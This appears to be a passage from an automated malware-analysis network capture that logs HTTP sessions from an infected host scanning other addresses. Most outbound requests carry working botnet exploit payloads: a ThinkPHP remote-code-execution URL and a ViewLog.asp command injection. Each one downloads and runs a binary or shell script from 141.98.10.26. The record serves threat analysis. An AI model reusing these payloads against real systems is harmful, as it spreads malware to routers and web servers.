Nov 22, 2023 08:38:39.470520020 CET	6002	IN	HTTP/1.1 400 Bad Request Server: nginx/1.9.9 Date: Wed, 22 Nov 2023 07:38:39 GMT Content-Type: text/html Content-Length: 172 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 39 2e 39 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.9.9</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
268	192.168.2.23	50374	88.209.219.149	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:39.291981936 CET	5940	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:39.495949984 CET	6004	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:38:39 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
269	192.168.2.23	33590	94.19.149.155	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:39.307342052 CET	6001	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
270	192.168.2.23	42648	62.92.49.20	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:39.505378008 CET	6006	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
271	192.168.2.23	37972	94.122.88.120	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:39.532984972 CET	6031	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
272	192.168.2.23	42166	94.121.65.146	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:39.533128023 CET	6032	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
273	192.168.2.23	59554	31.200.59.5	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:39.533257961 CET	6032	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
274	192.168.2.23	53320	31.136.181.57	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:39.689991951 CET	6044	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:40.268898964 CET	6059	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:41.388735056 CET	6222	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:43.724414110 CET	6517	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:48.331897020 CET	7064	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:57.290519953 CET	8191	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:15.719994068 CET	10472	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:52.578742981 CET	14840	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
275	192.168.2.23	36502	62.78.38.231	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:39.719276905 CET	6046	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:39.948374033 CET	6054	IN	HTTP/1.1 Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
276	192.168.2.23	37500	94.121.147.112	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:39.755498886 CET	6047	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
277	192.168.2.23	60558	94.121.119.119	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:39.755692959 CET	6048	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
278	192.168.2.23	55870	62.29.71.4	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:39.759608030 CET	6049	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
279	192.168.2.23	48220	94.120.159.53	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:39.760215044 CET	6050	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
280	192.168.2.23	51432	31.200.53.232	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:39.760353088 CET	6050	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
281	192.168.2.23	40454	95.86.91.137	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:39.926156998 CET	6053	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
282	192.168.2.23	58954	31.173.14.181	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:39.932399035 CET	6053	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:40.183249950 CET	6058	IN	HTTP/1.0 404 Not Found Content-type: text/html Date: Wed, 22 Nov 2023 07:38:40 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The requested URL was not found</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
283	192.168.2.23	58486	95.100.139.78	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:40.661519051 CET	6103	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:40.861335039 CET	6107	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 22 Nov 2023 07:38:40 GMT Date: Wed, 22 Nov 2023 07:38:40 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 63 65 38 36 62 61 35 64 26 23 34 36 3b 31 37 30 30 36 33 38 37 32 30 26 23 34 36 3b 33 62 38 37 30 35 63 38 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.ce86ba5d.1700638720.3b8705c8</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
284	192.168.2.23	49532	112.121.27.76	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:40.750778913 CET	6105	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:42.252741098 CET	6299	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:44.012459040 CET	6551	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:47.564071894 CET	7027	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:54.730875015 CET	7928	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:08.808871984 CET	9628	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:38.244731903 CET	13133	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
285	192.168.2.23	53376	95.142.154.144	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:40.840548992 CET	6106	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:41.021181107 CET	6111	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:38:40 GMT Server: Apache Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Connection: close Content-Type: text/html Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 